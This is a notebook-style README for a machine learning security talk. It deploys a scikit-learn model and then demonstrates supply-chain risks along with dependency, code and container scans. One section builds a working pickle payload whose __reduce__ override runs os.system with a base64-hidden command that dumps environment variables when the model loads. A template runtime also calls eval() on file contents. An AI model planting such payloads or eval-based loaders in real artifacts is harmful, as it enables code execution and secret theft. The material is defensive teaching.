This repo contains a set of resources relevant to the talk "Secure Machine Learning at Scale with MLSecOps", and provides a set of examples that showcase common, practical security flaws across the phases of the machine learning lifecycle.
We also present ways to mitigate and avoid these security vulnerabilities, which are grouped under the "SML Security (Safe ML Security)" repo.
Below are links to resources related to the talk, as well as references and relevant areas in machine learning security.
📄 Presentation Slides | 🗣️ Safe Machine Learning Project Template | 📽️ Talk Video
Below are direct links to the headers that map to the main sections of the presentation slides.
- Train Model and Deploy Artifact
- Load Pickle and Inject Malicious Code
- Adversarial Detection
- Dependency Vulnerability Scans
- Code Scans
- Container Scans
- Honourable Mentions
- Safe ML Project Template
📜 Machine Learning Ecosystem List | 📚 The State of ML Operations | 📈 Prod ML Monitoring
🌀 Accelerating ML Inference at Scale | 🕵️♀️ Alibi Detect Adversarial Detection | 👓 Practical AI Ethics
You can join the Machine Learning Engineer newsletter. You will receive updates on open source frameworks, tutorials and articles curated by machine learning professionals.
The notebook was created with the following requirements:
- kubectl - v1.22.5
- istioctl - v1.11.4
- helm - v3.7.0
- mc (minio client) - RELEASE.2020-04-17T08-55-48Z
- Kubernetes > 1.18
- Python 3.7
In order to set up the environment correctly, you will have to follow the SETUP.ipynb Jupyter notebook.
In this section we will train a machine learning model and deploy it with Seldon Core. We will gloss over many of the details; if you want to learn the ins and outs, see the talks referenced in the intro section above.
%%writefile requirements.txt
scikit-learn == 0.24.2
numpy >= 1.8.2
joblib == 0.16.0
Overwriting requirements.txt
!pip install -r requirements.txt
from sklearn import datasets
iris = datasets.load_iris()
X, y = iris.data, iris.target
from sklearn.linear_model import LogisticRegression
model = LogisticRegression(solver="liblinear", multi_class='ovr')
model.fit(X, y)
LogisticRegression(multi_class='ovr', solver='liblinear')
!mkdir -p fml-artifacts/safe/
import joblib
joblib.dump(model, "fml-artifacts/safe/model.joblib")
with open("fml-artifacts/safe/model.joblib", "rb") as f: print(f.readlines())
[b'\x80\x03csklearn.linear_model._logistic\n', b'LogisticRegression\n', b'q\x00)\x81q\x01}q\x02(X\x07\x00\x00\x00penaltyq\x03X\x02\x00\x00\x00l2q\x04X\x04\x00\x00\x00dualq\x05\x89X\x03\x00\x00\x00tolq\x06G?\x1a6\xe2\xeb\x1cC-X\x01\x00\x00\x00Cq\x07G?\xf0\x00\x00\x00\x00\x00\x00X\r\x00\x00\x00fit_interceptq\x08\x88X\x11\x00\x00\x00intercept_scalingq\tK\x01X\x0c\x00\x00\x00class_weightq\n', b'NX\x0c\x00\x00\x00random_stateq\x0bNX\x06\x00\x00\x00solverq\x0cX\t\x00\x00\x00liblinearq\rX\x08\x00\x00\x00max_iterq\x0eKdX\x0b\x00\x00\x00multi_classq\x0fX\x03\x00\x00\x00ovrq\x10X\x07\x00\x00\x00verboseq\x11K\x00X\n', b'\x00\x00\x00warm_startq\x12\x89X\x06\x00\x00\x00n_jobsq\x13NX\x08\x00\x00\x00l1_ratioq\x14NX\x0e\x00\x00\x00n_features_in_q\x15K\x04X\x08\x00\x00\x00classes_q\x16cjoblib.numpy_pickle\n', b'NumpyArrayWrapper\n', b'q\x17)\x81q\x18}q\x19(X\x08\x00\x00\x00subclassq\x1acnumpy\n', b'ndarray\n', b'q\x1bX\x05\x00\x00\x00shapeq\x1cK\x03\x85q\x1dX\x05\x00\x00\x00orderq\x1eh\x07X\x05\x00\x00\x00dtypeq\x1fcnumpy\n', b'dtype\n', b'q X\x02\x00\x00\x00i8q!\x89\x88\x87q"Rq#(K\x03X\x01\x00\x00\x00<q$NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tq%bX\n', b'\x00\x00\x00allow_mmapq&\x88ub\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00X\x05\x00\x00\x00coef_q\'h\x17)\x81q(}q)(h\x1ah\x1bh\x1cK\x03K\x04\x86q*h\x1eX\x01\x00\x00\x00Fq+h\x1fh X\x02\x00\x00\x00f8q,\x89\x88\x87q-Rq.(K\x03h$NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tq/bh&\x88ub, ?T\xff@\xda?\xf6_5nM\\\xdb?.z\xa2\x86\xfbQ\xfb\xbf\x0bh|N5m\xf7?w\xfa$3:\xcb\xf9\xbf\xbc\x99m\xbff\x8c\xf8\xbf{\xc8\x01\x01\x8c\x14\x02\xc0l\xcb\xc4e\x18m\xe2?\xb3s\x82\xa2\x8a\xc4\x03@`\xf08\xe4(V\xf0\xbf"\\}\x85\xaf\x7f\xf6\xbf\x03M#\n', b'fq\x04@X\n', b"\x00\x00\x00intercept_q0h\x17)\x81q1}q2(h\x1ah\x1bh\x1cK\x03\x85q3h\x1eh\x07h\x1fh.h&\x88ub\xb5~?\xd6\xf4\xe8\xd0?\x8d\xd5\xfc'\xb7\x80\xf1??\xc3\xdc\xe0ro\xf3\xbfX\x07\x00\x00\x00n_iter_q4h\x17)\x81q5}q6(h\x1ah\x1bh\x1cK\x01\x85q7h\x1eh\x07h\x1fh 
X\x02\x00\x00\x00i4q8\x89\x88\x87q9Rq:(K\x03h$NNNJ\xff\xff\xff\xffJ\xff\xff\xff\xffK\x00tq;bh&\x88ub\x07\x00\x00\x00X\x10\x00\x00\x00_sklearn_versionq<X\x06\x00\x00\x000.24.2q=ub."]
!mc cp -r fml-artifacts/ minio-seldon/fml-artifacts/
...el.joblib: 1.05 KiB / 1.05 KiB ┃▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓┃ 75.93 KiB/s 0s
kubectl apply -f - << END
apiVersion: machinelearning.seldon.io/v1
kind: SeldonDeployment
metadata:
  name: model-safe
spec:
  predictors:
  - graph:
      implementation: SKLEARN_SERVER
      modelUri: s3://fml-artifacts/safe
      envSecretRefName: seldon-init-container-secret
      name: classifier
    name: default
END
seldondeployment.machinelearning.seldon.io/model-safe unchanged
!kubectl get pods | grep model-safe
model-safe-default-0-classifier-68f495d845-l9ff9 2/2 Running 0 41m
import requests
url = "http://localhost:80/seldon/default/model-safe/api/v1.0/predictions"
requests.post(url, json={"data": {"ndarray": [[1,2,3,4]]}}).json()
{'data': {'names': ['t:0', 't:1', 't:2'],
'ndarray': [[0.0006985194531162835,
'meta': {'requestPath': {'classifier': 'seldonio/sklearnserver:1.13.1'}}}
import joblib
model_safe = joblib.load("fml-artifacts/safe/model.joblib")
import types, os, base64
def __reduce__(self):
    # This is basically base64 for cmd = "env > pwnd.txt"
    cmd = base64.b64decode("ZW52ID4gcHduZC50eHQ=").decode()
    # Pickle calls os.system(cmd) when the artifact is loaded
    return os.system, (cmd,)
model_safe.__class__.__reduce__ = types.MethodType(__reduce__, model_safe.__class__)
!mkdir -p fml-artifacts/unsafe/
joblib.dump(model_safe, "fml-artifacts/unsafe/model.joblib")
with open("fml-artifacts/unsafe/model.joblib", "rb") as f: print(f.readlines())
[b'\x80\x03cposix\n', b'system\n', b'q\x00X\x0e\x00\x00\x00env > pwnd.txtq\x01\x85q\x02Rq\x03.']
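The byte dump above shows that the tampered artifact no longer contains a model at all: it only imports `posix.system` and calls it on load. A minimal sketch of how such an artifact could be inspected without unpickling it is shown below. It uses the standard-library `pickletools` module to list the globals a pickle would import; the `imported_globals` helper and the `Payload` class are hypothetical names introduced for illustration, and the handling of `STACK_GLOBAL` is a simple heuristic rather than a complete scanner.

```python
import os
import pickle
import pickletools


def imported_globals(data: bytes) -> set:
    """Return the 'module.name' globals a pickle would import when loaded.

    The pickle is only disassembled, never executed.
    """
    found = set()
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols <= 3: the argument is "module name" separated by a space
            module, name = arg.split(" ", 1)
            found.add(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocols >= 4: module and name are the two most recent strings
            found.add(f"{strings[-2]}.{strings[-1]}")
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class Payload:
    """Hypothetical stand-in for the tampered model class."""

    def __reduce__(self):
        # Returned to pickle at dump time; nothing is executed here
        return os.system, ("echo harmless",)


malicious = pickle.dumps(Payload())
benign = pickle.dumps({"coef": [1.0, 2.0]})

print(sorted(imported_globals(malicious)))  # includes an os-level "system" global
print(sorted(imported_globals(benign)))
```

A check like this could run before `joblib.load`, rejecting any artifact whose imported globals fall outside an allow-list of expected modules such as `sklearn`, `numpy` and `joblib`. It does not replace verifying where the artifact came from.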
!mc cp -r fml-artifacts/ minio-seldon/fml-artifacts/
...el.joblib: 1.05 KiB / 1.05 KiB ┃▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓┃ 111.11 KiB/s 0s
kubectl apply -f - << END
apiVersion: machinelearning.seldon.io/v1
kind: SeldonDeployment
metadata:
  name: model-unsafe
spec:
  predictors:
  - graph:
      implementation: SKLEARN_SERVER
      modelUri: s3://fml-artifacts/unsafe
      envSecretRefName: seldon-init-container-secret
      name: classifier
    name: default
END
seldondeployment.machinelearning.seldon.io/model-unsafe unchanged
!kubectl get pods
model-safe-default-0-classifier-68f495d845-l9ff9 2/2 Running 0 43m
model-unsafe-default-0-classifier-85969ff86c-kd62w 2/2 Running 0 43m
UNSAFE_POD=$(kubectl get pod -l app=model-unsafe-default-0-classifier -o jsonpath="{.items[0].metadata.name}")
kubectl exec $UNSAFE_POD -c classifier -- head -5 pwnd.txt
!rm pwnd.txt
import joblib
model_unsafe = joblib.load("fml-artifacts/unsafe/model.joblib")
!head -4 pwnd.txt
!rm pwnd.txt
!kubectl delete sdep model-safe model-unsafe
seldondeployment.machinelearning.seldon.io "model-safe" deleted
seldondeployment.machinelearning.seldon.io "model-unsafe" deleted
For adversarial detection, see the Alibi Detect end-to-end adversarial detection example: https://docs.seldon.io/projects/alibi-detect/en/latest/examples/alibi_detect_deploy.html
We use bandit for Python AST code scans, which can also be extended to the code used in Jupyter notebooks where relevant.
Examples of key areas that we are interested in identifying:
- Ensuring secrets/keys are not committed to the repo
- Ensuring bad practices are avoided where there is a clear potential risk
- Identifying and flagging potentially risky code paths
- Providing suggestions where best practices apply
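To make the idea of an AST code scan more concrete, the sketch below walks a Python syntax tree with the standard-library `ast` module and reports calls to a small set of risky functions. This is not how bandit is implemented; the `RISKY_CALLS` set and the `find_risky_calls` helper are hypothetical names chosen for illustration, and a real scanner covers far more patterns.

```python
import ast

# Hypothetical, deliberately small deny-list for illustration
RISKY_CALLS = {"eval", "exec", "os.system", "pickle.load", "pickle.loads"}


def dotted_name(node):
    """Rebuild a dotted name such as 'os.system' from a call target node."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None


def find_risky_calls(source: str):
    """Return sorted (line number, call name) pairs for risky calls in source."""
    findings = []
    # The source is parsed only; it is never executed
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in RISKY_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


sample = "import os\nvalue = eval(user_input)\nos.system('ls')\n"
print(find_risky_calls(sample))  # [(2, 'eval'), (3, 'os.system')]
```

Because the scan works on the syntax tree rather than on running code, it can be applied safely to untrusted sources, which is the same property that makes tools like bandit suitable for CI pipelines.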
!pip install bandit
!bandit .
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.7.12
[manager] WARNING Skipping directory (.), use -r flag to scan contents
Run started:2022-04-10 17:04:48.838869
Test results:
No issues identified.
Code scanned:
Total lines of code: 0
Total lines skipped (#nosec): 0
Run metrics:
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 0
High: 0
Total issues (by confidence):
Undefined: 0
Low: 0
Medium: 0
High: 0
Files skipped (0):
Note that the run above scanned zero lines of code: as the warning in the output states, bandit skips directories unless the -r flag is passed, so `bandit -r .` is needed to scan the contents of the repo recursively.
!cat requirements.txt
scikit-learn == 0.24.2
numpy >= 1.8.2
joblib == 0.16.0
!pip install pipdeptree
If we inspect the dependency tree of scikit-learn itself, we can see that its dependencies are declared as version ranges:
- joblib [required: >=0.11, installed: 0.16.0]
- numpy [required: >=1.13.3, installed: 1.21.5]
- scipy [required: >=0.19.1, installed: 1.7.3]
  - numpy [required: >=1.16.5,<1.23.0, installed: 1.21.5]
- threadpoolctl [required: >=2.0.0, installed: 3.1.0]
This means that a fresh install may resolve second-level (and deeper) dependencies to different versions, which can cause undesired effects.
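As a rough illustration of the problem, the sketch below flags entries in a requirements file that are not pinned to an exact version. It relies only on a regular expression and treats anything other than a plain `name == version` line as unpinned; the `unpinned` helper is a hypothetical name, and the parsing is intentionally simpler than the full requirement syntax that pip accepts.

```python
import re

# Matches "name == version" with no wildcard in the version
PINNED = re.compile(r"^\s*([A-Za-z0-9._-]+)\s*==\s*[^\s*]+\s*$")


def unpinned(requirements_text: str):
    """Return the requirement lines that are not pinned to an exact version."""
    loose = []
    for line in requirements_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments and whitespace
        if line and not PINNED.match(line):
            loose.append(line)
    return loose


requirements = """scikit-learn == 0.24.2
numpy >= 1.8.2
joblib == 0.16.0"""

print(unpinned(requirements))  # ['numpy >= 1.8.2']
```

Even a fully pinned top-level file does not pin transitive dependencies, which is why a freeze or a lock file is still needed.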
We can create a makeshift environment freeze by using pip directly.
!pip freeze > requirements-freeze.txt
!head -10 requirements-freeze.txt
A better solution is to use poetry to lock the dependencies required into a .lock file that saves a fully reproducible environment.
%%writefile pyproject.toml
[tool.poetry]
name = "fml-security"
version = "0.1.0"
description = ""
authors = ["Alejandro Saucedo <[email protected]>"]

[tool.poetry.dependencies]
python = ">=3.7,<3.11"
seldon-core = "1.13.1"
scikit-learn = "0.24.2"
numpy = "1.21.5"
joblib = "0.16.0"

[tool.poetry.dev-dependencies]
pytest = "^5.2"

[build-system]
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
Overwriting pyproject.toml
!poetry install
!head -20 poetry.lock
[[package]]
name = "atomicwrites"
version = "1.4.0"
description = "Atomic file writes."
category = "dev"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"

[[package]]
name = "attrs"
version = "21.4.0"
description = "Classes Without Boilerplate"
category = "main"
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"

[package.extras]
dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "furo", "sphinx", "sphinx-notfound-page", "pre-commit", "cloudpickle"]
docs = ["furo", "sphinx", "zope.interface", "sphinx-notfound-page"]
tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "cloudpickle"]
!pip install safety
!safety check -r requirements-freeze.txt
| checked 60 packages, using free DB (updated once a month) |
| package | installed | affected | ID |
| numpy | 1.21.5 | <1.22.0 | 44717 |
| numpy | 1.21.5 | <1.22.0 | 44716 |
| numpy | 1.21.5 | <1.22.2 | 44715 |
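Each row in the report above pairs an installed version with an affected range. The check behind a row such as `1.21.5` against `<1.22.0` can be sketched as a tuple comparison, as below. This is only an illustration and not how safety is implemented; the `parse_version` and `is_affected` helpers are hypothetical, and they assume purely numeric dotted versions (no pre-release or local suffixes).

```python
def parse_version(text: str) -> tuple:
    """Turn '1.21.5' into (1, 21, 5); assumes numeric dotted versions only."""
    return tuple(int(part) for part in text.split("."))


def is_affected(installed: str, upper_bound: str) -> bool:
    """True when the installed version is strictly below the fixed version."""
    return parse_version(installed) < parse_version(upper_bound)


print(is_affected("1.21.5", "1.22.0"))  # True
print(is_affected("1.22.2", "1.22.2"))  # False
```

Comparing integer tuples rather than raw strings avoids mistakes such as treating `1.9.0` as newer than `1.21.5`.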
Continuously ensuring that dependencies are up to date is important. There are older tools for this such as piprot, as well as good tools such as Dependabot.
!pip install piprot
!piprot requirements-freeze.txt
Your requirements are 11798 days out of date
mkdir -p owasp/deps owasp/data/cache owasp/report
docker run --rm \
-e user=$USER \
-u $(id -u ${USER}):$(id -g ${USER}) \
--volume $(pwd):/src:z \
--volume $(pwd)/owasp/data:/usr/share/dependency-check/data:z \
--volume $(pwd)/owasp/report:/report:z \
owasp/dependency-check:latest \
--scan /src \
--format "ALL" \
--project "dependency-check scan: $(pwd)" \
--out /report
!cat owasp/report/dependency-check-report.csv
"Project","ScanDate","DependencyName","DependencyPath","Description","License","Md5","Sha1","Identifiers","CPE","CVE","CWE","Vulnerability","Source","CVSSv2_Severity","CVSSv2_Score","CVSSv2","CVSSv3_BaseSeverity","CVSSv3_BaseScore","CVSSv3","CPE Confidence","Evidence Count"
!trivy image --severity CRITICAL seldonio/sklearnserver:1.14.0-dev
2022-04-11T19:29:06.350+0100 INFO Detected OS: redhat
2022-04-11T19:29:06.350+0100 INFO Detecting RHEL/CentOS vulnerabilities...
2022-04-11T19:29:06.404+0100 INFO Number of language-specific files: 1
2022-04-11T19:29:06.404+0100 INFO Detecting python-pkg vulnerabilities...
seldonio/sklearnserver:1.14.0-dev (redhat 8.5)
Total: 0 (CRITICAL: 0)
Python (python-pkg)
Total: 0 (CRITICAL: 0)
Above are a set of honorable mentions that are not covered in this notebook, but that would still be relevant to check out. You can follow the resources at the top for other links to relevant areas for deeper dives.
%%writefile sml-security.yml
project_name: "Example Project"
Writing sml-security.yml
!cookiecutter https://github.com/EthicalML/sml-security --no-input --config-file sml-security.yml
!tree example_project/
├── Dockerfile
├── Makefile
├── README.md
├── docs
│   ├── Makefile
│   ├── commands.rst
│   ├── conf.py
│   ├── examples
│   │   └── model-settings.json
│   ├── getting-started.rst
│   ├── index.rst
│   └── make.bat
├── example_project
│   ├── __init__.py
│   ├── common.py
│   ├── runtime.py
│   └── version.py
├── pyproject.toml
├── requirements-dev.txt
├── setup.py
└── tests
    ├── conftest.py
    └── test_runtime.py
4 directories, 20 files
!cat example_project/pyproject.toml
name = "Example Project"
version = "0.1.0"
description = "A short description of the project."
authors = ["MyGithubUsername"]
license = "MIT"
python = "^3.8"
mlserver = "1.1.0.dev6"
fastapi = "^0.78"
Sphinx = "3.2.1"
coverage = "4.5.4"
flake8 = "3.9.0"
safety = "1.10.3"
piprot = "0.9.11"
bandit = "1.7.4"
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"
!cat example_project/example_project/runtime.py
import numpy as np
from mlserver.model import MLModel
from mlserver.settings import ModelSettings
from fastapi import status
from mlserver.utils import get_model_uri
from mlserver.errors import InvalidModelURI, MLServerError
from mlserver.types import (
from mlserver.codecs import NumpyCodec, NumpyRequestCodec
from example_project.common import ExampleProjectSettings
class ExampleProject(MLModel):
"""Runtime class for specific Huggingface models"""
def __init__(self, settings: ModelSettings):
self._extra_settings = ExampleProjectSettings(**settings.parameters.extra) # type: ignore
async def load(self) -> bool:
# Simple showcase reading a lambda as string either from file or
model_uri = await get_model_uri(self._settings)
with open(model_uri, "r") as f:
self._model = eval(f.read())
except (InvalidModelURI, IsADirectoryError):
self._model = eval(self._extra_settings.lambda_value)
if not callable(self._model):
raise MLServerError("Invalid lambda value provided", status.HTTP_500_INTERNAL_SERVER_ERROR)
self.ready = True
return self.ready
async def predict(self, payload: InferenceRequest) -> InferenceResponse:
Prediction request
# For more advanced request decoding see MLServer codecs documentation
model_input = NumpyRequestCodec.decode(payload)
model_output = self._model(model_input)
model_output_np = np.array(model_output)
encoded_output = NumpyCodec.encode("predict", model_output_np)
return InferenceResponse(
!make -C example_project/ local-run
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
mlserver start docs/examples/. &
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!make -C example_project/ local-test-request
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
curl http://localhost:8080/v2/models/test-model/infer \
-H "Content-Type: application/json" \
-d '{"inputs":[{"name":"test_input","shape":[3],"datatype":"INT32","data":[1,2,3]}]}'
{"model_name":"test-model","model_version":null,"id":"894a189e-cce3-4329-aa71-495d5b61621e","parameters":null,"outputs":[{"name":"predict","shape":[],"datatype":"INT64","parameters":null,"data":[6]}]}
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!curl http://localhost:8080/v2/models/test-model/infer \
-H "Content-Type: application/json" \
-d '{"inputs":[{"name":"test_input","shape":[3],"datatype":"INT32","data":[1,2,3]}]}'
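The request body used in the curl command above can also be built programmatically. The sketch below constructs the same JSON payload from a flat list of values; the `build_v2_request` helper is a hypothetical name, and it only covers the single one-dimensional input used in this example.

```python
import json


def build_v2_request(values, name="test_input", datatype="INT32"):
    """Build an inference request body with one flat, one-dimensional input."""
    return {
        "inputs": [
            {
                "name": name,
                "shape": [len(values)],
                "datatype": datatype,
                "data": list(values),
            }
        ]
    }


body = build_v2_request([1, 2, 3])
# Compact separators reproduce the exact string passed to curl with -d
print(json.dumps(body, separators=(",", ":")))
```

Assuming the server from the local-run step is still listening on port 8080, the resulting dictionary could be sent with `requests.post("http://localhost:8080/v2/models/test-model/infer", json=body)`.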
!make -C example_project/ security-local-code
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
bandit .
[main] INFO profile include tests: None
[main] INFO profile exclude tests: None
[main] INFO cli include tests: None
[main] INFO cli exclude tests: None
[main] INFO running on Python 3.7.10
[manager] WARNING Skipping directory (.), use -r flag to scan contents
Run started:2022-06-04 08:24:43.129814
Test results:
No issues identified.
Code scanned:
Total lines of code: 0
Total lines skipped (#nosec): 0
Run metrics:
Total issues (by severity):
Undefined: 0
Low: 0
Medium: 0
High: 0
Total issues (by confidence):
Undefined: 0
Low: 0
Medium: 0
High: 0
Files skipped (0):
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!make -C example_project/ security-local-dependencies
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
poetry export --without-hashes -f requirements.txt | safety check --full-report --stdin
Warning: unpinned requirement 'NoCompatiblePythonVersionFound' found in <stdin>, unable to check.
| checked 0 packages, using free DB (updated once a month) |
| No known security vulnerabilities found. |
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'
!make -C example_project/ security-local-dependencies-old
make: Entering directory '/home/alejandro/Programming/fml-security/example_project'
poetry export --without-hashes -f requirements.txt | piprot --latest --outdated -
Looks like you've been keeping up to date, time for a delicious beverage!
make: Leaving directory '/home/alejandro/Programming/fml-security/example_project'